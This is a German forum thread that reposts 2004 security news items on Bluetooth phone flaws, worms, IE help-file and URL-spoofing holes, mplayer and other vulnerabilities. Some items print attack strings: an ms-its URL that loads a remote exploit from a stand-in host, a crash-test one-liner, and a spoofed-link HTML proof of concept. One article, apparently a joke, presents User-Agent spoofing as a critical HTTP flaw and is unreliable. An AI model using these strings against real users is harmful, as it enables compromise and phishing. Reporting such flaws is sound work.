Zur Durchführung des Angriffs ist (über das Know-how hinaus) nur ein Linux-PC oder -PDA mit Bluetooth-Adapter sowie ein relativ simples Programm zum Absetzen der entsprechenden Kommandos zum Bluetooth-Stack erforderlich. Integralis plant, das Programm nach Ablauf von 45 Tagen zu veröffentlichen -- innerhalb der Frist haben die betroffenen Herstellern die Möglichkeit, Firmware-Upgrades herauszubringen. Nach derzeitigem Kenntnisstand sind das Nokia 6310i sowie das Sony Ericsson T610 betroffen. Es sei jedoch nicht ausgeschlossen, dass noch andere betroffene Handys entdeckt werden, hieß es bei Integralis.

Bluetooth erlaubt die individuelle Konfiguration der bei Verbindungsaufbau anzuwendenden Sicherheitsmechanismen (Authentifizierung und Verschlüsselung) in Abhängigkeit von Dienst und Geräteadresse des anfragenden Geräts (Bluetooth "Security Mode 2"). Die dazu erforderlichen Informationen sind in einer Datenbank im Handy gespeichert. Laut Michael Müller von Integralis liegt bei der neu entdeckten Sicherheitslücke kein prinzipieller Fehler dieser Sicherheitsarchitektur vor, sondern im Wesentlichen Nachlässigkeit der Hersteller bei der Implementierung des Autorisierungsvorgangs -- wie auch schon in früheren Fällen beobachtet. Zur Durchführung des Angriffs ist es erforderlich, die Geräteadresse des Opfergerätes zu kennen.

Um sich vor solchen Angriffen zu schützen, sollte man die Bluetooth-Funktion seines Handys nur dann aktivieren, wenn man sie wirklich braucht. Vor allem sollte man das Gerät nur dann sichtbar schalten ("Discoverable Mode"), wenn man für andere, erwünschte Partner sichtbar sein will. Das verhindert zwar die Angriffe nicht, erschwert ihre Durchführung aber beträchtlich. Hat einmal eine Kopplung mit einem Partner stattgefunden, so ist die Sichtbarkeit für diesen Partner nicht mehr erforderlich. Zudem sollten die Besitzer der betroffenen Handys beim Hersteller auf ein entsprechendes Firmware-Upgrade drängen, das das Problem behebt.



Siehe dazu auch:

• Pressemeldung von Integralis

http://www.heise.de/security/news/meldung/46097

###

Viren werden für Kleinunternehmen zum finanziellen Problem



Network Associates, Hersteller von IT-Sicherheitsprodukten, hat eine Studie zu Schäden von Viren in europäischen Kleinunternehmen veröffentlicht. Befragt wurden 500 Firmen in Deutschland, Frankreich, Großbritannien, Italien, den Niederlanden und Spanien. Aufgrund schlechter oder fehlender Schutzmaßnahmen verursache die zunehmende Flut von Computerviren- und Wurmattacken jährliche Schäden in Höhe von 22 Milliarden Euro, wobei die durchschnittlichen Kosten für lahm gelegte Rechner pro Virenattacke 5000 Euro erreichen. Eine von fünf befragten Firmen musste die Arbeit wegen eines Virenbefalls vorübergehend einstellen, in Frankreich war sogar jede zweite Firma betroffen.

Laut Studie mussten ein Drittel der deutschen Kleinunternehmen nach einem Virenbefall neue Hardware anschaffen; ob diese für verbesserte Schutzmaßnahmen angeschafft wurde, lässt der Report jedoch offen. 29 Prozent hätten nach einem Befall wichtige Dateien verloren oder massive Beschädigungen festgestellt.

Die deutschen Mitarbeiter sind im europäischen Vergleich am vorsichtigsten im Umgang mit Dateianhängen in elektronischer Post. Während in Frankreich 24 Prozent der Mitarbeiter den Anhang einer E-Mail mit unbekanntem Absender öffnen würden, täten das in Deutschland nur 9 Prozent. Ähnlich verhalte es sich auch beim Klick auf unbekannte Links. Beim Weiterleiten unbekannter Dateianhänge sei man in Deutschland besonders vorsichtig: 98 Prozent hätten dies noch nie getan, obwohl 53 Prozent glauben, schon mal unbewusst eine infizierte Mail versandt zu haben. Mit 11 Prozent weist Deutschland den höchsten Anteil von Firmen auf, die keinen Virenschutz einsetzten, in Spanien und Großbritannien seien dies nur 1 Prozent.


http://www.heise.de/security/news/meldung/46098

Bagle-Nachwuchs ohne Ende



[Viren & Würmer] (http://www.heise.de/newsticker/meldung/46049) Eine neue Variante des Bagle-Wurms verbreitet sich seit dem heutigen Morgen. Im Unterschied zu den vorigen Varianten verschickt sich Bagle.U alias W32.Beagle.U@mm, Bagle.U, WORM_BAGLE.U, W32/Bagle-U, W32/Bagle.u@MM exklusiv als .exe-Attachment.

Ansonsten unterscheidet sich die U-Variante wenig von seinen Vorgängern, allerdings ist diese Schädlingsmutation mit dem Packer FSG statt UPX komprimiert, was die Antiviren-Hersteller zur Nachbesserung ihrer Signaturen nötigte, damit die neue Variante erkannt wird. Offenbar verbreitet sich der Schädling schon ziemlich rasant, sowohl MessageLabs als auch Norman haben die neue Variante als hohes Risiko eingestuft. MessageLabs hat bereits über 6000 Exemplare des Schädlings abgefangen. Network Associates hat die Risiko-Einstufung von niedrig auf mittel erhöht.

http://www.rotalarm.de/
Gravierende Sicherheitslücke bei Handys



[drahtlos & mobil] (http://www.intern.de/news/5453.html) Wie am Sonntag bereits von Spiegel TV berichtet, hat der europäische IT-Sicherheitsdienstleister Integralis eine gravierende Schwachstelle bei verschiedenen marktführenden Handymodellen entdeckt. Sobald die Nutzer die Bluetooth-Schnittstelle in diesen Handys aktivieren, können Hacker via Laptop oder PDA heimlich über die Handys Telefonate einleiten zum Beispiel auch an kostenpflichtige 0190-Nummern.

Hacker können zudem aktuelle Gespräche des Handy-Nutzers unterbrechen oder gar beenden. Aber damit nicht genug: Die bisher analysierten Mobiltelefone gestatten es Hackern, SMS-Nachrichten des Handy-Besitzers zu lesen und SMS-Nachrichten in seinem Namen zu verschicken. Angreifer können des weiteren Adressbücher und Terminkalender lesen und überschreiben und die gefälschten Daten sowohl im Handy-Speicher als auch auf der SIM-Karte abspeichern.

Bislang hat Integralis nach eigenen Angaben die Sicherheitslücke in verschiedenen Handytypen von zwei marktführenden Herstellern gefunden. Es handelt sich dabei um technische Schwachstellen der Bluetooth-Schnittstelle in den Geräten. Das Bluetooth-Protokoll selbst ist nicht betroffen.

Alle Angriffe via Bluetooth sind je nach Gerät in einem Umkreis zwischen 10 und 100 Metern durchführbar. Hacker benötigen für diese Angriffe lediglich einen Laptop oder einen Linux-betriebenen PDA. Sie haben dabei auch die Möglichkeit, Mikrofon und Lautsprecher der entsprechenden Handys auf ihren Laptop oder PDA umzuleiten. Über Scripte und Tools lassen sich derartige Angriffe auch automatisiert durchführen. Die Schwachstelle erfordere im Gegensatz zu bisher veröffentlichten Sicherheitslücken keinen physischen Kontakt zwischen Angreifer und Handy.

Möglicherweise sind viele aktuelle Geräte verschiedenster Hersteller betroffen, Integralis rät allen Handy-Benutzern, die Bluetooth-Funktionalität in ihren Mobiltelefonen nur in sicherer Umgebung zu aktivieren, und keinesfalls an öffentlichen Plätzen wie z.B. Bahnhöfen, Flughäfen oder Messen. Allerdings kann man auch in den eigenen vier Wänden nicht wirklich sicher vor Angreifern sein, da diese in einem Umkreis von maximal 100 Metern agieren können. Zudem sollte der Sichtbarkeitsmodus immer ausgeschaltet sein, was allerdings keinen Schutz vor Angriffen garantiert. Handy-Besitzer sollten sich bei ihren Herstellern nach neuen Firmware-Versionen für ihre mobilen Endgeräte erkundigen.

http://www.rotalarm.de/
Mehrere Schwachstellen in HPs Web Jetadmin



[Serverprogramme] (http://www.heise.de/newsticker/meldung/46038) In HPs Web Jetadmin zum Verwalten und Konfigurieren von Druckern im Netzwerk sind mehrere Fehler enthalten, die es Angreifern über das Netzwerk ermöglichen, das System zu kompromittieren. Web Jetadmin basiert auf einer modifizierten Version des Apache/Tomcat-Webservers, der lokal auf einem Rechner installiert wird und mittels Browser den Zugriff auf angeschlossene Drucker oder Scanner ermöglicht.

Der Webserver lässt sich auch für andere Benutzer freigeben, um etwa das Scannen im Netzwerk zu ermöglichen. Aufgrund einiger Schwachstellen in Jetadmin kann ein Angreifer aber beliebige Daten auf das System hoch- und herunterladen, sofern Jetadmin nicht mit einem Passwort gesichert ist – standardmäßig ist kein Passwort vergeben. Mit weiteren Tricks ist es möglich, eigene Skripte auf dem PC abzulegen und im SYSTEM-Kontext auszuführen. Betroffen ist die Windows-Version 7.5.2546 und vorherige. Der Autor des auf Bugtraq veröffentlichten Advisories empfiehlt die Vergabe eines Passworts und nur die lokale IP-Adresse (127.0.0.1) für den Zugriff auf Jetadmin zuzulassen. HP ist über die Schwachstellen informiert und plant, einen Patch herauszubringen.

Sicherheitslücke in Oracles Datenbank- und Application-Servern



[Serverprogramme] (http://enterprisesecurity.symantec.de/symes608.cfm?JID=2&PID=10416651) Oracle warnt vor einer Sicherheitslücke in seinen Datenbank- und Application-Servern. Betroffen ist die Verarbeitung von Simple Object Access Protocol-Messages (SOAP-Messages), deren XML konstruierte Document Type Definitions (DTDs) enthält. Angreifer könnten die Lücke für Denial-of-Service-Attacken missbrauchen. SOAP gehört zu den Grundlagen für Web-Services, die deshalb ebenfalls betroffen sind. Besonders gefährdet ist der 9i Application Server Release 2 in Versionen bis 9.0.2.1. Entsprechende Patches stehen zum Download bereit.

http://www.rotalarm.de/

####

Internet Explorer wieder im Visier



Bereits vor einigen Wochen hatte Thor Larholm auf eine kritische Schwachstelle des Internet Explorer im Umgang mit Hilfedateien hingewiesen. Mittlerweile sind konkrete Details zu dem Sicherheitsproblem veröffentlicht, und erste Würmer und Websites nutzen es aus, um die Rechner von IE-Anwendern zu infizieren. Zum Glück waren die ersten Exemplare recht ineffizient und fanden keine große Verbreitung.

Das Problem lässt sich auf einen simplen Redirect zurückführen. Gibt man in einer mhtml-URL eine Hilfeseite an, die nicht existiert, dann lädt der Internet Explorer eine zweite Hilfedatei und startet diese mit den Rechten der ersten. Existiert C:\foo.mht nicht, so öffnet

ms-its :mhtml:file://C:\foo.mht!http://evil.site/exploit.chm::exploit.htm

die externe Hilfedatei, als wäre es eine lokale. Diese kann dann unter anderem Dateien nachladen und Dateien auf dem lokalen Rechner überschreiben. Betroffen sind alle Versionen des Internet Explorer ab 5.0.1, von Microsoft gibt es bisher keine Stellungnahme zu dem Problem. Auf dem c't-Browsercheck von heise Security können Sie testen, ob Ihr System verwundbar ist. Eine harmlose Version der Demo legt lediglich eine neue Datei an, die "scharfe" überschreibt Notepad.exe und startet dieses Programm.

Siehe dazu auch:

• Demo zu mtml-Redirects auf dem c't-Browsercheck
• Details zur Schwachstelle auf SecurityFocus

http://www.heise.de/security/news/meldung/46126

####

Wurm Netsky.Q attackiert Tauschbörsen- und Crackerseiten



Aufgrund der starken Verbreitung des Wurms Netsky.Q haben die Hersteller von Antivirensoftware die Warnstufen erhöht. Zwischen dem 8. und 11. April startet er von infizierten Systemen eine Denial-of-Service-Attacke gegen www.edonkey2000.com, www.kazaa.com, www.emule-project.net, www.cracks.am und www.cracks.st. Zusätzlich beginnt er am 30. 3. morgens ab 5.11 Uhr über den PC-Lautsprecher zu piepen.

Wie Netsky.P nutzt er eine alte Lücke in ungepatchten Internet-Explorer-Versionen 5.01 und 5.5 aus, um den Mailanhang -- in dem der Wurm steckt -- automatisch auszuführen. Das allein erklärt aber nicht die erfolgreiche Verbreitung, da nur noch wenige Nutzer die alten Browserversionen einsetzen dürften. Offenbar klicken Anwender -- trotz fast täglicher Viren- und Wurmwarnungen -- munter weiter auf Attachments.

Derzeit sind fünf Mass-Mailing-Würmer in nennenswerten Stückzahlen im Internet unterwegs: Netsky.B, Netsky.C, Netsky.D, Netsky.Q und Netsky.R. Das morgendliche Öffnen des elektronischen Postfachs wird mittlerweile zur Geduldsprobe ob der vielen verschiedenen Samples -- wenn sie nicht schon der Mailscanner aussortiert hat. Bleiben aber immer noch die nervigen Benachrichtigungen, man hätte eine Mail mit einem Wurm verschickt. Da die Würmer immer ihre Absenderadresse fälschen, kommen die Benachrichtigungen allerdings sowieso beim Falschen an. Administratoren sollten diese automatischen Mails ihrer Virenscanner möglichst abschalten, da sie nur zusätzliche Netzlast erzeugen.

Die Hersteller von Antivirensoftware haben aktualisierte Signaturen bereitgestellt. Ein kostenloses Tool zur Beseitigung des Wurms bietet NAI mit Stinger an. Auch Symantec hält ein Programm zu Beseitigung bereit. Weitere Hinweise zu Viren und Würmern finden Sie auf den Antiviren-Seiten von heise Security



Siehe dazu auch:

• Wurmbeschreibung von Symantec
• Wurmbeschreibung von NAI

###

Debian schließt Lücke in Authentifizierungsmodul pam-pgsql



Debian hat ein Advisory über einen Fehler im Pluggable Authentication Modul (PAM) pam-pgsql veröffentlicht. pam-pgsql dient zur Authentifizierung mittels einer PostgreSQL-Datenbank. Eine Funktion des Moduls überprüft Benutzereingaben nicht korrekt, sodass ein Angreifer eigene Befehle an die Datenbank übergeben kann (SQL-Injection). Debian empfiehlt, die neuen Pakete zu installieren. Ob andere Distributionen von dem Fehler betroffen sind, ist nicht bekannt. Das ursprüngliche Projekt auf Source-Forge scheint nicht mehr weitergepflegt zu werden: Der letzte Release ist auf den 10. September 2002 datiert.

Siehe dazu auch:

• Security Advisory von Debian

http://www.heise.de/security/news/meldung/46114

Sicherheitsloch in Linux Movie Player



Ein Fehler im mplayer für Linux ermöglicht es Angreifern, eigenen Code in das System zu schleusen und mit den Rechten des angemeldeten Benutzers auszuführen. mplayer bietet die Möglichkeit, online Media-Dateien von einem Webserver zu laden und abzuspielen (HTTP Streaming Content). Die Schwachstelle beruht auf einem Fehler im HTTP-Header-Parser: Ein manipulierter Location-Header kann einen Heap Overflow provozieren. Um die Schwachstelle auszunutzen, muss ein Angreifer allerdings den Webserver unter seine Kontrolle gebracht haben beziehungsweise einen eigenen Server betreiben.



Die Entwickler von mplayer haben den Fehler bestätigt. Betroffen sind die Versionen 0.90pre, 0.90rc, 0.90, 0.91, 1.0pre1, 1.0pre2 und 1.0pre3. Anwender sollten auf die neuen Versionen 1.0pre3try2 oder 0.92.1 wechseln. Alternativ steht ein Patch für alle fehlerhaften Versionen zur Verfügung. Ob der eigene mplayer verwundbar ist, können Benutzer mit folgender Zeile feststellen: $ mplayer http://`perl -e 'print "\""x1024;'`
Fehlerhafte Versionen erzeugen nach Angaben des Entdeckers der Schwachstelle, ein Sicherheitsspezialist mit dem Pseudonym Blexim, einen Segmentation Fault.




Siehe dazu auch:

• Security Advisory auf MPLAYER.HQ
• Security Advisory von Blexim

###

Franzosen knacken Funktelefonverschlüsselung



Interessante Einblicke in das Tätigkeitsfeld der französischen "Direction Centrale de la Sécurité des Systemès d'Information" (DCSSI) gewährt ein Dokument, das die Aktivitäten des eigenen Schulungsinstituts "Centre de Formation à la Sécurité de Systèmes d'Information" (CFSSI) beschreibt. Auf Seite 31 findet sich ein Kursangebot mit dem Thema

• cryptanalyse opérationnelle du DECT (norme ETSI de réseaux local sans fil)

Der Kurs behandelt also die Kryptanalyse von DECT (ETSI-Norm in lokalen Funknetzen). Nicht ganz klar ist die Bedeutung von "opérationnelle" in diesem Zusammenhang. Es kann sowohl "in Echtzeit" als auch nur allgemein "angewandt/praktisch" bedeuten. Der Kurs richtet sich an ausgewählte Teilnehmer aus dem öffentlichen Dienst mit profunder Vorbildung -- etwa Diplom-Ingenieure aus dem Informatik-Umfeld mit Berufserfahrung im Bereich Datensicherheit.

Das Kursangebot legt die Vermutung nahe, dass die DCSSI die Echtzeitentschlüsselung von DECT beherrscht, und somit in der Lage ist, verschlüsselte Telefonate mit DECT-Telefonen abzuhören. DECT ist eine populäre europäische Technik zur drahtlosen Telefonie im Heimbereich. Es verwendet den 'DECT Standard Cipher' (DSC, ein Stromverschlüsselungsalgorithmus) zur Verschlüsselung der Nutzdaten. DSC wurde von ETSI (eine europäische Standardisierungsbehörde im Bereich Telekommunikation) standardisiert; die Spezifikation wird jedoch nur an handverlesene Firmen abgegeben. Es ist auch nicht bekannt, ob in Frankreich eine geschwächte Variante von DECT zum Einsatz kommt (wie bei GSM). Die Tatsache, dass ETSI ebenfalls in Frankreich angesiedelt ist, gibt natürlich Anlass zu weiteren Spekulationen.

Die DCSSI ist eine dem französischen Verteidigungsministerium nahe stehende Behörde, die sich mit Aspekten der Sicherheit in der Informationstechnik auseinander setzt. Während sie sich fachlich etwa im Bereich des deutschen BSI bewegt, ist die strategische Ausrichtung eher mit der US-amerikanischen NSA vergleichbar. (Michael Schmidt) /

http://www.heise.de/security/news/meldung/46146
####

Integer Underflow bringt tcpdump zum Absturz



Der Sicherheitsdienstleister Rapid7 hat in tcpdump zwei Schwachstellen entdeckt, mit denen sich die Applikation zum Absturz bringen lässt. Beide Fehler sind in den Funktionen zum Lesen und Anzeigen von ISAKMP-Paketen enthalten, die IPSec-VPN-Gateways zum Aufbau einer Verbindung untereinander austauschen. Der erste Fehler basiert auf einem Buffer Overflow beim Lesen eines Paketes mit zu vielen SPIs (Security Parameter Index). Ungewöhnlich ist der Fehler Nummer zwei: Pakete mit zu kurzen Identifizierungsdaten provozieren einen Integer Underflow. Beide Fehler lassen sich mit manipulierten ISAKMP-Paketen über das Netzwerk ausnutzen. Betroffen ist Version 3.8.1 und frühere. In der seit gestern verfügbaren Version 3.8.3 sind die Fehler behoben.

Rapid7 hat den Fehler nach eigenen Angaben beim Testen der IPSec-Implementierungen verschiedener Hersteller gefunden. Die eigenentwickelte Protocol Test Suite "Striker" erzeugt und sendet ungültige beziehungsweise fehlerhafte ISAKMP-Pakete. Dabei sei dann aufgefallen, dass tcpdump bei einigen Paketen abstürze.

Siehe dazu auch:

• Security Advisory von Rapid7

http://www.heise.de/security/news/meldung/46150

Welchen Sinn machen eigentlich all diese hier getätigten unreflektierten Reposts? Hat der powerforen.de-Server zu viel Speicherkapazität oder ist das hier eine Teststrecke für Copy and Paste?

Klappt doch gut mit dem Copy and Paste.

Seinerzeit hab ich mal ne Umfrage gemacht, und da war es gewünscht. Und das war ein bischen vor deiner Zeit hier.


Grüße

Ich finde es gut. Für Security News habe ich (neben Newslettern) nur Heise, so sehe ich auch, was anderswo Interessantes läuft. Im Übrigen ist das da oben kein simples Copy&Paste, sogar die Links im Text werden mit umgesetzt.

Sicherheitsloch bei der Browser-Authentifizierung



Der israelische Hacker Ncevy hat eine Schwachstelle im Hypertext Transfer Protocol (HTTP, RFC 1945) aufgedeckt, die Browser und Server aller Hersteller betrifft. Die Browser-Authentifizierung ist unzureichend gesichert und lässt sich beliebig manipulieren. Über gefälschte User-Agent-Header können Angreifer so genannte Browser-Spoofing-Angriffe durchführen. heise Security sind mehrere Fälle bekannt, in denen Hacker durch Browser-Spoofing bereits die Schutzmechanismen von Web-Servern ausgehebelt haben.

Da die Schwachstelle in der Protokollspezifikation liegt, betrifft sie plattformübergreifend alle Browser und Server. Ncevy hat als Proof-of-Concept-Exploit ein Browser-in-the-Middle-Programm (BMP) entwickelt, mit dem sich solche Browser-Spoofing-Attacken sogar für ganze Netzwerke automatisieren lassen.

Besonders kritisch ist dieses Sicherheitsproblem, weil nicht nur der ungesicherte HTTP-Verkehr, sondern auch der verschlüsselte HTTPS-Verkehr betroffen ist. Selbst SSL-Client-Authentifizierung kann Browser-Spoofing nicht verhindern. Da HTTPS auch für Online-Banking eingesetzt wird, lassen sich selbst Server bekannter Banken durch Browser-Spoofing-Angriffe täuschen und geben unbeabsichtigt Web-Seiten preis, auf die der Benutzer eigentlich keinen Zugriff erhalten sollte.

Microsoft hat das Problem bereits bestätigt und erklärt, dass man an einer Lösung arbeite. Die Open-Source-Gemeinde will in den nächsten Tage ein Apache-Modul bereitstellen, das eine kryptografisch gesicherte Browser-Authentifizierung ermöglicht. Dabei bildet der Server einen MD5-Hash über alle vom Browser gesendeten Informationen und entscheidet dann, ob die übertragenen Daten stimmen.

Bis alle Server- und Browser-Hersteller Patches und Erweiterungen bereitstellen, empfiehlt Ncevy als Schutzmaßnahme, auf Servern kein HTTP mehr einzusetzen. Auch Anwender sollten beim Surfen auf das schon vom Design her unsichere HTTP verzichten.


http://www.heise.de/security/news/meldung/46175

#####

Weiterer Trick zum URL-Spoofen im Internet Explorer [2. Update]



Auf Bugtraq und Full Disclosure ist ein Posting erschienen, das eine weitere Möglichkeit beschreibt, im Internet Explorer 6 und Outlook Express 6 gefälschte URLs in der Status-Leiste anzuzeigen (URL-Spoofing). Bereits Anfang Februar hatte Microsoft einen Patch bereitgestellt, der URL-Spoofing durch das Verwenden das @-Zeichens verhindert. Für den neuen Trick hat der Sicherheitsspezialist mit dem Pseudonym http-equiv, bekannt durch mehrere Veröffentlichungen zu Schwachstellen im Internet Explorer, bereits folgenden Proof-of-Concept-Code geschrieben:



<Ahref="http://www.microsoft.com"><FORM action=http://www.malware.com/t-bill.html method=get><INPUT style="BORDER-RIGHT: 0pt;BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt; CURSOR: hand; COLOR:blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: transparent;TEXT-DECORATION: underline" type=submit value=http://www.microsoft.com></A>


Ist dieser Code in einem HTML-Dokument eingebettet, so zeigen Internet Explorer und Outlook Express einen Link auf www.microsoft.com an. Bewegt man den Mauszeiger über den Hyperlink, so zeigt auch die Statusleiste www.microsoft.com an, obwohl der Link eigentlich auf www.malware.com/t-bill.html führt. Der Trick besteht darin, den Link als sogenanntes HTML-Form zu definieren. Normalerweise dienen solche Forms zum Übertragen von Benutzerdaten mittels GET oder POST an den Webserver. Fälschlicherweise zeigen der Browser und der E-Mail-Client statt der Form-Adresse die Link-Adresse an.

Anwender können in dem Glauben, die Webseiten von Microsoft zu besuchen, auf den Link klicken. Der Besuch der falschen Seite an sich ist noch nicht besonders tragisch, aufgrund weiterer, bislang ungepatchter Sicherheitslücken im Internet Explorer kann es das aber schnell werden. Durch diese zusätzlichen Lücken reicht allein der Besuch eines manipulierten Servers aus, um Würmer, Trojaner und Dialer installiert zu bekommen.

Die harmlose Demo von http-equiv führt zunächst auf die Seite www.malware.com, die sofort wieder auf www.microsoft.com umleitet, sodass der Benutzer kaum merkt, dass etwas nicht stimmt. Allein der kurze Aufruf genügt aber, um auf C: die Datei malware.exe zu schreiben. Nach Angaben von http-equiv erkennen einige Antivirenscanner die Demo als Angriff. Für den neuen URL-Spoofing-Trick gibt es noch keinen Patch. Mit dem c't-Browsercheck können Anwender überprüfen, ob ihr Internet Explorer über aktuelle Schwachstellen verwundbar ist.

[Update]
Auch andere Browser zeigen mit dem Demo-Code mehr oder minder falsche URLs an. Opera 7.20 zeigt einen als www.microsoft.com benannten Button an, neben dem ein weiterer, nicht sichtbarer Link platziert ist. Ein Klick auf den Button führt zur Malware-Seite, der unsichtbare Link hingegen zu Microsoft. KDEs Konqueror 3.1.3 verhält sich ähnlich, allerdings führen sowohl Button als auch Link zu www.malware.com. Firefox 0.8 zeigt sich unbeeindruckt: Den dargestellten Link weist die Statuszeile zwar als www.microsoft.com aus. Ein Klick darauf führt aber auch wirklich nur zu Microsoft.

Auf dem c't-Browsercheck finden Sie eine harmlose Demonstration des Problems. Damit können Sie selbst testen, wie sich Ihr Browser verhält.



Siehe dazu auch:

• Demo auf dem c't-Browsercheck
• Security Advisory von http-equiv

http://www.heise.de/security/news/meldung/46200

####

Bill Gates: Microsoft macht Fortschritte bei der Sicherheit



Microsoft-Gründer und Chief Software Architect Bill Gates hat das Thema Sicherheit zum Anlass genommen, um sich in einer "Executive E-Mail" an die Kunden des Redmonder Konzerns zu wenden. Darin schreibt er, schädliche Software verbreite sich schon seit vielen Jahren. Aber in der letzten Zeit, in denen Millionen neuer Breitband-Internetzugänge und Computer verkauft wurden, habe das Problem zugenommen. Es sei ein weltweites Netz entstanden, in dem ein Virus oder ein Wurm in kurzer Zeit zirkulieren könne.

Zudem seien kriminelle Cracker hinterlistiger geworden und hätten Epidemien wie mit den Würmern Slammer, Blaster, Sobig und Mydoom ausgelöst. Die Bedrohungen würden zunehmen, da nun Computernutzer auch zu unschuldigen Virenschleudern werden könnten, wie sich bei Blaster gezeigt habe.

Währenddessen machten Microsoft und die IT-Branche gute Fortschritte. Gates' Firma investiere hauptsächlich in die vier Bereiche Isolation und Abfederung, Aktualisierung, Qualität sowie Authentifizierung und Zugangskontrolle. Außerdem setzten die Redmonder viel Geld für die Aufklärung der Kunden ein und für Unternehmensallianzen, in denen es um die Verbesserung der Sicherheit beim Umgang mit Computern geht. Es werde immer Herausforderungen geben, aber der Einfluss der Cyberkriminellen werde auf Dauer eingeschränkt, nicht zuletzt durch Forschungsmittel von Microsoft, meint Gates. Windows XP Service Pack 2, neue Anti-Spam-Tools und vieles mehr würden in nächster Zeit die Sicherheit der Windowsnutzer verbessern, erläutert der Microsoft-Gründer in seiner E-Mail.

"Sicherheit ist wichtig und eine Herausforderung für unsere Branche. Dabei geht es nicht darum, ein paar Sicherheitslücken zu stopfen", betonte Gates. Die Eindämmung schädlichen Codes verlange neues Denken über Softwarequalität, kontinuierliche Fortschritte bei Werkzeugen und Investitionen in Sicherheitstechniken. Zudem müssten Computernutzer besser aufgeklärt werden. "Es darf nicht einigen Cyberkriminellen überlassen werden, dass wir den großen Nutzen der fortgeschrittenen Informationstechnik nicht uneingeschränkt genießen können", beschwört Gates die IT-Branche und ihre Kunden.


http://www.heise.de/security/news/meldung/46207

####

Oracles Single Sign-on erleichtert Ausspähen von Anmeldedaten



Oracles Single Sign-on Applikation OSSO lässt sich unter bestimmten Umständen von Angreifern zum Ausspähen von Anmeldedaten missbrauchen. OSSO basiert auf Web-Login-Formularen, das Anwender über eine URL aufrufen können.

Ein von Oracle empfohlenes Beispiel-Login-Skript ("Oracle 9iAS Single Sign-on Administrators Guide, Release 2(9.0.2)") bietet aber die Möglichkeit, weitere Parameter an diese URL zu hängen ("p_submit_url"), um Anwender an andere Server umzuleiten. Der Nutzer merkt davon nichts: Es erscheint ihm, als wäre er regulär mit dem OSSO-Server verbunden, sogar ein gültiges Zertifikat wird übermittelt. Allerdings sendet er nun Benutzername und Passwort an den Server des Angreifers. Vorher muss der Angreifer den Anwender aber dazu verleiten, eine entsprechend manipulierte URL anzuklicken -- die zunächst auch zum richtigen Server führt. Nach Angaben der Entdecker der Lücke empfiehlt Oracle einen Workaround zur Beseitung. Nähere Angaben dazu sind dem Original-Advisory zu entnehmen.



Siehe dazu auch:

• Security Advisory von madison-gurkha

http://www.heise.de/security/news/meldung/46210

###

Postini erhält Patent auf Spam-Filter



Der E-Mail-Provider Postini hat nach eigenen Angaben ein Patent auf das Filtern von E-Mail nach Spam, Viren oder anderen unerwünschten Bestandteilen bekommen. Das US-Patent Nr. 6,650,890 ist dem Unternehmen bereits im November 2003 zugesprochen worden.

Das Patent ist allerdings recht allgemein formuliert; es beinhaltet unter anderem die Bearbeitung und Filterung von E-Mails auf einem separaten Server, bevor sie dann weiter an die Endkunden ausgeliefert werden. Das Unternehmen beliefert nach eigenen Angaben rund 2600 Firmenkunden und rund fünf Millionen einzelne User mit E-Mail.

Branchenpionier MessageLabs Ltd. zeigte sich nach einem Bericht des Internet-Informationsdienstes Infoworld zunächst unbeeindruckt.

http://www.heise.de/security/news/meldung/46212

Netsky.Q attackiert Tauschbörsen- und Crackerseiten



[Viren & Würmer] (http://www.heise.de/newsticker/meldung/46112) Aufgrund der starken Verbreitung des Wurms Netsky.Q alias W32.Netsky.Q@mm, W32/Netsky.Q@mm, W32/Netsky-Q, WORM_NETSKY.Q, Win32.Netsky.Q, I-Worm.NetSky.r haben die Hersteller von Antivirensoftware die Warnstufen erhöht. Zwischen dem 8. und 11. April startet er von infizierten Systemen eine Denial-of-Service-Attacke gegen www.edonkey2000.com, www.kazaa.com, www.emule-project.net, www.cracks.am und www.cracks.st. Zusätzlich begann er am 30.3. morgens ab 5.11 Uhr über den PC-Lautsprecher zu piepen. Wie Netsky.P nutzt er eine alte Lücke in ungepatchten Internet-Explorer-Versionen 5.01 und 5.5 aus, um den Mailanhang – in dem der Wurm steckt – automatisch auszuführen. Das allein erklärt aber nicht die erfolgreiche Verbreitung, da nur noch wenige Nutzer die alten Browserversionen einsetzen dürften. Offenbar klicken Anwender – trotz fast täglicher Viren- und Wurmwarnungen – munter weiter auf Attachments.

http://www.rotalarm.de/
IE wieder im Visier



[online/Browser/Email] Microsoft Internet Explorer MT-ITS Protocol Zone Bypass Vulnerability (http://www.heise.de/newsticker/meldung/46126) Bereits vor einigen Wochen hatte Thor Larholm auf eine kritische Schwachstelle des Internet Explorer im Umgang mit Hilfedateien hingewiesen. Mittlerweile sind konkrete Details zu dem Sicherheitsproblem veröffentlicht, und erste Würmer und Websites nutzen es aus, um die Rechner von IE-Anwendern zu infizieren. Zum Glück waren die ersten Exemplare recht ineffizient und fanden keine große Verbreitung. Das Problem lässt sich auf einen simplen Redirect zurückführen. Gibt man in einer mhtml-URL eine Hilfeseite an, die nicht existiert, dann lädt IE eine zweite Hilfedatei und startet diese mit den Rechten der ersten. Existiert C:\foo.mht nicht, so öffnet ms-its: mhtml:file://C:\foo.mht!http://evil.site/exploit.chm::exploit.htm die externe Hilfedatei, als wäre es eine lokale. Diese kann dann unter anderem Dateien nachladen und Dateien auf dem lokalen Rechner überschreiben. Betroffen sind alle Versionen des IE ab 5.0.1, von Microsoft gibt es bisher keine Stellungnahme zu dem Problem.

http://www.rotalarm.de/
Sicherheitsloch in Linux Movie Player



[Linux] Exploitable remote buffer overflow vulnerability in the HTTP parser (http://www.heise.de/newsticker/meldung/46154) Ein Fehler im mplayer für Linux ermöglicht es Angreifern, eigenen Code in das System zu schleusen und mit den Rechten des angemeldeten Benutzers auszuführen. mplayer bietet die Möglichkeit, online Media-Dateien von einem Webserver zu laden und abzuspielen (HTTP Streaming Content). Die Schwachstelle beruht auf einem Fehler im HTTP-Header-Parser: Ein manipulierter Location-Header kann einen Heap Overflow provozieren. Um die Schwachstelle auszunutzen, muss ein Angreifer allerdings den Webserver unter seine Kontrolle gebracht haben beziehungsweise einen eigenen Server betreiben.

